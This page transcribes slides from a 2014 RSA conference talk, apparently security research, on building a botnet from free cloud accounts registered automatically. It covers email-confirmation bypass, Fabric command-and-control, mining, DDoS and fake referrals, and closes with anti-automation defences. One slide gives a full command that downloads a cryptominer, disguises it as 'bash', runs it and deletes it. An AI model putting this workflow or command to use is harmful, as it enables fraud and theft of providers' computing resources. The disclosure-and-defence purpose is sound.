cloud ninja
play

CLOUD NINJA Catch Me If You Can! RSA 2014 Thursday, February 27, - PowerPoint PPT Presentation

Nov 12, 2022 •493 likes •887 views

CLOUD NINJA Catch Me If You Can! RSA 2014 Thursday, February 27, 2014 | 8:00am 9:00am | West | Room: 3002 Overview What are these guys talking about? Main Topics Could we build a botnet from freely available cloud services? Will we

  1. CLOUD NINJA Catch Me If You Can! RSA 2014 Thursday, February 27, 2014 | 8:00am – 9:00am | West | Room: 3002

  2. Overview What are these guys talking about? Main Topics • Could we build a botnet from freely available cloud services? • Will we see the rise of more cloud based botnets? • Should insufficient anti-automation be considered a top ten vulnerability? 2

  3. Cloud PaaS Platform as a Service 4

  4. Free Cloud Services Platform as a Service <Insert with other providers later> Reference: http://goo.gl/AZ4nYp 5

  5. Free Cloud Services Development Environment as a Service 6

  6. AUTOMATION Scripting the Cloud

  7. Cloud Providers (In)Security Usability vs Security Automating Registration • Hurdles - Email address confirmation - CAPTCHA - Phone/SMS - Credit Card 8

  8. Fraudulent Account Registration Anti-Automation 66 % Email Confirmation Only 33 % More Anti-Automation EMAIL CAPTCHA CREDIT CARD PHONE 9

  9. Cloud Providers (In)Security Usability vs Security Anti-Automation Techniques • Email address confirmation • CAPTCHA • Phone/SMS • Credit Card 10

  10. Unique Email Addresses Realistic Randomness Avoid Pattern Recognition <Insert wall of random email addresses> 11

  11. Real Email Addresses Realistic Randomness Unlimited usernames - Prevent pattern recognition - Pull from real world examples [local-part from dump]@domain.tld 12

  12. Plethora of Email Addresses SMTP Services Unlimited domains - freedns.afraid.org - Prevent detection - Thousands of unique email domains 13

  13. Free DNS Subdomains Unlimited email addresses 14

  14. Receiving Email and Processing Free Signups What do we need? • Free email relay - Free MX registration • Process wildcards - *@domain.tld • Send unlimited messages - Unrestricted STMP to HTTP POST/JSON requests 15

  15. Email Confirmation Token Processing SMTP Services Automated email processing - Extract important information from incoming emails - Grep for confirmation token links and request them Account registration - Automatic request sent to account activation links 16

  16. DEMONSTRATION Automatic Account Creation

  17. Email Addresses Automated Registration Workflow 18

  18. Storing Account Information Keeping track of all accounts MongoDB • MongoLab • MongoHQ 19

  19. FUNTIVITIES Botnets Are Fun!

  20. Botnet Activities Now we have a botnet! Fun! What can we do? • Distributed Network Scanning • Distributed Password Cracking • DDoS • Click-fraud • Crypto Currency Mining • Data Storage 21

  21. Command & Control Botnet C2 What are we using? • Fabric - Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. • fab check_hosts – P – z 20 • fab run_command 22

  22. Distributed Command Unique Amazon IP Addresses [na1.cloudbox.net:15149]: curl http://icanhazip.com 184.169.182.155 [eu1.cloudbox.net:14317]: curl http://icanhazip.com 176.34.56.246 [na1.cloudbox.net:16960]: curl http://icanhazip.com 54.251.42.128 [na1.cloudbox.net:15167]: curl http://icanhazip.com 54.216.236.7 [na1.cloudbox.net:14319]: curl http://icanhazip.com 54.228.153.1 [na1.cloudbox.net:14358]: curl http://icanhazip.com 54.216.3.252 23

  23. Litecoin Mining All your processors are belong to us Make money, money • Deploying miners • One command for $$$ if [ ! -f bash ]; then wget http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer- 2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2- linux-x86_64.tar.gz && rm pooler-cpuminer-2.3.2-linux- x86_64.tar.gz && mv minerd bash; fi; screen ./bash – url=stratum+tcp://china.mine-litecoin.com --userpass=ninja.47:47; rm bash 24

  24. Distributed Command Load After Crypto Currency Mining ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:13378 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15151 | 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:16351 | 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:14358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:12152 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:12151 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:12150 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:12149 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:16298 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:16297 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:13161 | 1 user, load average: 26.04, 25.57, 20.02 25

  25. Litecoin Mining All your processors are belong to us 26

  26. Unlimited Storage Space Refer Fake Friends 27

  27. Unlimited Storage Space Refer Fake Friends 28

  28. DEMONSTRATION Distributed Denial of Service (DDoS)

  29. DETECTION No one can catch a ninja!

  30. Disaster Recovery Plan Armadillo Up ™ Automatic Backups • Propagate to other similar services - e.g. MongoLab   MongoHQ • Infrastructure across multiple service providers • Easily migrated 31

  31. RISING TREND Active Attacks

  32. Cloud Provider Registration Adaptation 33

  33. Cloud Provider Registration Adaptation 34

  34. Cloud Provider Registration Adaptation 35

  35. PROTECTION Bot Busters

  36. Protection Usability vs Security What can we do? • Logic puzzles • Sound output • Credit card validation • Live operators • Limited-use account • Heuristic checks • Federated identity systems Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions 37

  37. Protection At Abuse vs At Registration What should we do? • Analyzing properties of Sybil accounts • Analyzing the arrival rate and distribution of accounts • Flag accounts registered with emails from newly registered domain names • Email verification • CAPTCHAs • IP Blacklisting • Phone/SMS verification • Automatic pattern recognition Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf 38

  38. Protection At Abuse vs At Registration Advanced techniques • Signup flow events - Detect common activities after signup • User-agent - A registration bot may generate a different user-agent for each signup or use uncommon user-agents • Form submission timing - A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf 39

  39. Oscar Salazar @tracertea Rob Ragan @sweepthatleg THANK YOU CONTACT@BISHOPFOX.COM

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Behind the scenes of a C64 demo Ninja / The Dreams 28C3 Ninja / The Dreams Behind the scenes of

Behind the scenes of a C64 demo Ninja / The Dreams 28C3 Ninja / The Dreams Behind the scenes of

Behind the scenes of a C64 demo Ninja / The Dreams 28C3 Ninja / The Dreams Behind the scenes of a C64 demo About me Linux kernel hacker embedded systems low level computing prefers limited machines and thats mainly because. . . Ninja /

821 views • 26 slides
Study of Charged-Current neutrino interactions on water with nuclear emulsion in the NINJA

Study of Charged-Current neutrino interactions on water with nuclear emulsion in the NINJA

NINJA Study of Charged-Current neutrino interactions on water with nuclear emulsion in the NINJA experiment Ayami Hiramoto (Kyoto Univ.) Y . Suzuki, T.Fukuda, T,Nakaya for the NINJA collaboration 2019.09.09 2

728 views • 30 slides
Be secret like a ninja with Mehdi LARUELLE Hashicorp Vault @D2SI Whoami ? D2SI Me Mehdi

Be secret like a ninja with Mehdi LARUELLE Hashicorp Vault @D2SI Whoami ? D2SI Me Mehdi

Be secret like a ninja with Mehdi LARUELLE Hashicorp Vault @D2SI Whoami ? D2SI Me Mehdi LARUELLE Cloud &amp; Automation @mehdilaruelle Github Access Table of contents Contextualization 1 How does Vault work ? 2 Steps to become a

875 views • 22 slides
Ninja University IN THE CITY OF NEW YORK Kshitij Bhardwaj kb2673 Van Bui vb2363 Vinti Vinti

Ninja University IN THE CITY OF NEW YORK Kshitij Bhardwaj kb2673 Van Bui vb2363 Vinti Vinti

Ninja University IN THE CITY OF NEW YORK Kshitij Bhardwaj kb2673 Van Bui vb2363 Vinti Vinti vv2236 Kuangya Zhai kz2219 Overview Wiimote controlled object slicing game on SoCKit board Motivated by Fruit Ninja game Storyline :

431 views • 23 slides
CMake &amp; Ninja by Istvn Papp istvan.papp@ericsson.com Hello &amp; Disclaimer I dont

CMake &amp; Ninja by Istvn Papp istvan.papp@ericsson.com Hello &amp; Disclaimer I dont

CMake &amp; Ninja by Istvn Papp istvan.papp@ericsson.com Hello &amp; Disclaimer I dont know everything (surprise!), if I stare blankly after a question, go to https://cmake.org/ Spoiler alert: or https://ninja-build.org/ Contents

862 views • 50 slides
current interactions on iron in the NINJA experiment Contents Toho Univ. , Nagoya Univ., Kobe

current interactions on iron in the NINJA experiment Contents Toho Univ. , Nagoya Univ., Kobe

Study of neutrino charged current interactions on iron in the NINJA experiment Contents Toho Univ. , Nagoya Univ., Kobe Univ., Introduction Nihon Univ., Kyoto Univ., Yokohama national Univ. ICRR and Univ. of Tokyo NINJA experiment

623 views • 26 slides
WooCommerce WooCommerce Online Marketing Online Marketing Black Belt Ninja Style Black Belt

WooCommerce WooCommerce Online Marketing Online Marketing Black Belt Ninja Style Black Belt

WooCommerce WooCommerce Online Marketing Online Marketing Black Belt Ninja Style Black Belt Ninja Style Online Marketing White Hat Tips &amp; Tricks Every Woo Store Owner Must Know To Run Successful &amp; Profitable Retail Shops. By Emanuel

838 views • 20 slides
BAS, Operational Energy Savings, Building Analytics, and M&amp;V: OnTrack &amp; Ninja Box 1

BAS, Operational Energy Savings, Building Analytics, and M&amp;V: OnTrack &amp; Ninja Box 1

BAS, Operational Energy Savings, Building Analytics, and M&amp;V: OnTrack &amp; Ninja Box 1 Introduction 2 Overview Apparently, Hospitals will always need Savings Stuff vs. Staff Low-hanging Fruit programs are popular with

375 views • 20 slides
Embracing Cloud Ian Apperley Agenda A little about me What is Cloud and where did it come

Embracing Cloud Ian Apperley Agenda A little about me What is Cloud and where did it come

Embracing Cloud Ian Apperley Agenda A little about me What is Cloud and where did it come from? Why Cloud? Cloud for small, medium, enterprise, and government Barriers to adoption Embracing Cloud Social Mobile Cloud

972 views • 45 slides
SUCCESS By : Miles Beckler STEP 1 SETUP YOUR FUNNEL Ninja tools not necessary Even

SUCCESS By : Miles Beckler STEP 1 SETUP YOUR FUNNEL Ninja tools not necessary Even

FAST TRACK YOUR FACEBOOK PPC SUCCESS By : Miles Beckler STEP 1 SETUP YOUR FUNNEL Ninja tools not necessary Even HTML pages work fine! Do you have more time than money? Want control? Use Wordpress &amp; Thrive Themes Landing Page

629 views • 25 slides
Dancer (the Effortless Perl Web Framework) About me Sawyer X Sysadmin / Perl Ninja

Dancer (the Effortless Perl Web Framework) About me Sawyer X Sysadmin / Perl Ninja

Dancer (the Effortless Perl Web Framework) About me Sawyer X Sysadmin / Perl Ninja Israel.pm / Haifa.pm / TelAviv.pm / Rehovot.pm I do system, networking, web, applications, etc. http://blogs.perl.org/users/sawyer_x/

769 views • 31 slides
SAS and (the) Cloud Dave Annis SAS Solutions onDemand SAS and (the) Cloud Everyones Cloud

SAS and (the) Cloud Dave Annis SAS Solutions onDemand SAS and (the) Cloud Everyones Cloud

SAS and (the) Cloud Dave Annis SAS Solutions onDemand SAS and (the) Cloud Everyones Cloud Tour of the buzzwords, myths and realities Whats in store for me, the boss, the company, the industry? Your cloud, our cloud their

224 views • 19 slides
Csse3002 Tuesday 2 For process modelling, Jeff the ninja recommends... Little-JIL Overview

Csse3002 Tuesday 2 For process modelling, Jeff the ninja recommends... Little-JIL Overview

Csse3002 Tuesday 2 For process modelling, Jeff the ninja recommends... Little-JIL Overview What is Little-JIL? Jared Why use Little-JIL? Douglas Interrupt if you have a question What is Little-JIL? Research at UMass

805 views • 52 slides
ANKO THE ULTIMATE NINJA OF KOTLIN LIBRARIES? AGENDA What are Kotlin and Anko?

ANKO THE ULTIMATE NINJA OF KOTLIN LIBRARIES? AGENDA What are Kotlin and Anko?

KAI KOENIG (@AGENTK) ANKO THE ULTIMATE NINJA OF KOTLIN LIBRARIES? AGENDA What are Kotlin and Anko? Anko-related idioms and language concepts Anko DSL The hidden parts of Anko Anko VS The Rest Final thoughts WHAT ARE

807 views • 54 slides
CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is

CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is

Cornell CS5412 Cloud Computing (Spring 2015) 1 CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is cheaper! The cloud business model is growing at an unparalleled pace without any limit in sight

632 views • 45 slides
CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is

CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is

1 CS5412: THE CLOUD VALUE PROPOSITION Lecture XXII Ken Birman Cloud Hype 2 The cloud is cheaper The cloud business model is growing at an unparalleled pace without any limit in sight In the future everything will be on the cloud

945 views • 65 slides
Introduction to Computer Security Why do we need computer security? What are our goals and

Introduction to Computer Security Why do we need computer security? What are our goals and

Introduction to Computer Security Why do we need computer security? What are our goals and what threatens them? Lecture 1 Page 1 CS 236 Online Why Is Security Necessary? Because people arent always nice Because a lot of

415 views • 25 slides
Transfer Learning Approach for Botnet Detection based on Recurrent Variational Autoencoder

Transfer Learning Approach for Botnet Detection based on Recurrent Variational Autoencoder

Transfer Learning Approach for Botnet Detection based on Recurrent Variational Autoencoder Jeeyung Kim Scientific Data Management Research Group Computational Research Division Lawrence Berkeley National Laboratory 2020 SNTA, 06/02/2020 J.

423 views • 21 slides
Advertising, Analytics and Tracking Thierry Sans Advertising I have a cool car to sell and

Advertising, Analytics and Tracking Thierry Sans Advertising I have a cool car to sell and

Advertising, Analytics and Tracking Thierry Sans Advertising I have a cool car to sell and Design an ad and give it to me I want people to know about it Advertiser I have a cool website, many viewers, Put this ad on your webpage! and I want

459 views • 23 slides
Combating Click Fraud Using Premium Clicks Sid Stamm , RavenWhite Inc. and Indiana University

Combating Click Fraud Using Premium Clicks Sid Stamm , RavenWhite Inc. and Indiana University

Combating Click Fraud Using Premium Clicks Sid Stamm , RavenWhite Inc. and Indiana University Joint Work With Ari Juels , RSA Laboratories, RSA/EMC Corp Markus Jakobsson , RavenWhite Inc. Research Performed at RavenWhite Inc. 1 Click

600 views • 46 slides
Apache Apex: Next Gen Big Data Analytics Thomas Weise &lt;thw@apache.org&gt; @thweise PMC Chair

Apache Apex: Next Gen Big Data Analytics Thomas Weise &lt;thw@apache.org&gt; @thweise PMC Chair

Apache Apex: Next Gen Big Data Analytics Thomas Weise &lt;thw@apache.org&gt; @thweise PMC Chair Apache Apex, Architect DataTorrent Apache Big Data Europe, Sevilla, Nov 14 th 2016 Stream Data Processing Real-time Data Delivery Transform /

632 views • 35 slides
Malice on the Internet A Peek into Todays Security Attacks Arvind Krishnamurthy Thursday,

Malice on the Internet A Peek into Todays Security Attacks Arvind Krishnamurthy Thursday,

Malice on the Internet A Peek into Todays Security Attacks Arvind Krishnamurthy Thursday, November 4, 2010 Bit of History: Morris Worm Worm was released in 1988 by Robert Morris Graduate student at Cornell, son of NSA scientist

926 views • 89 slides
HOW TO DETECT AND PREVENT FRAUD The webinar will begin shortly. Make sure your computers

HOW TO DETECT AND PREVENT FRAUD The webinar will begin shortly. Make sure your computers

HOW TO DETECT AND PREVENT FRAUD The webinar will begin shortly. Make sure your computers sound (volume) is un -muted ( icon) We recommend using headphones for better sound quality INTRODUCTION NAU MAI HAERE MAI Francesca Ephraim

359 views • 24 slides
Broadening the Housing Movement Webinar August 16, 2018 @OppStartsatHome National

Broadening the Housing Movement Webinar August 16, 2018 @OppStartsatHome National

@OppStartsatHome #OpportunityStartsatHome www.opportunityhome.org Broadening the Housing Movement Webinar August 16, 2018 @OppStartsatHome National Campaign Staff #OpportunityStartsatHome www.opportunityhome.org Mike Koprowski

316 views • 18 slides

More recommend